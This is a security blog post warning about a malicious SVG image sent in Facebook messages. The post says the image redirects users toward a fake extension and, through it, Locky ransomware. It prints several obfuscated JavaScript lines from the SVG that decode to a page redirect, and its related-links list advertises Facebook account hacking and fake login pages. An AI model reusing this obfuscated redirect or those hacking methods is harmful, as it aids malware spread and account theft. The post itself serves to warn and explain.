/

Facebook SPAM Alert! – Malicious SVG File is Spreading through Facebook Messages

Have you received any kind of Image file through Facebook messages lately?

If yes, Is it in SVG Format?

If it is, Please don’t click on it.

Facebook Spam in messages

Spammers have crafted malicious Image (SVG file) that will make you install ransomware on to your System and in turn infect all of your friends through the same medium i.e Facebook messages.

Scalable Vector Graphics (SVG) is an XML-based image format used to serve vector images. If you notice, Our logo is also in SVG format. You can download and inspect it by opening the file in a text editor.

The reason the spammers choose to use SVG images for spamming is that it allows dynamic content. Spammers had added malicious JavaScript code right inside the image itself, which in this case was a link to an external file which would, in turn, download locky Ransomeware.

What would happen if you click that Spam Image?

You can check out the SVG file code here:
http://pastebin.com/Ma5t0Fj0

If you look at the SVG file on Pastebin, Observe the lines 48 to 51

var hdekw = window;
var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);
var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);
var lpvxzt = bxtqxbl("nso6/z",2,false);
hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);

Spammers have cleverly used cryptographic techniques to bypass Facebook’s file checkers and then execute a window function.

If you log these variables in the console:

console.log(ljfji);
console.log(pryyb);
console.log(lpvxzt);
console.log(bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true));

You would get this:

top
location
href

Clearly it appears that the malicious SVG file is attempting to redirect you to , which happens to be a fake YouTube video page that will force you to install malicious Chrome Extension.

Facebook SPAM in SVG file

When the extension gets installed, It would then takes advantage of your browser’s access to your Facebook account to covertly SPAM your friends with the same SVG image file, Helping this SPAM to Spread more.

Furthermore, The extension also downloads “Nemucod downloader”, which is a generic malware downloader generally used to fetch and install various ransomware. In this case, the malware downloader downloads “Locky ransomware”, leaving your system locked.

You can read more about ransomware in my previous post on Rise of malicious JavaScript.

Source: @peterkruse

Related posts:

  1. How to find out who made a fake Facebook account
  2. Getting IP Address from Facebook Messenger App
  3. How to track location of Facebook user
  4. How to find out who created a fake Facebook account
  5. Get Facebook hack tool
  6. Get fake Facebook login page
  7. Hack Facebook account online
  8. How to hack a Facebook account with a laptop
  9. Facebook invite friends to like page

Ashwin S

A cybersecurity enthusiast at heart with a passion for all things tech. Yet his creativity extends beyond the world of cybersecurity. With an innate love for design, he's always on the lookout for unique design concepts.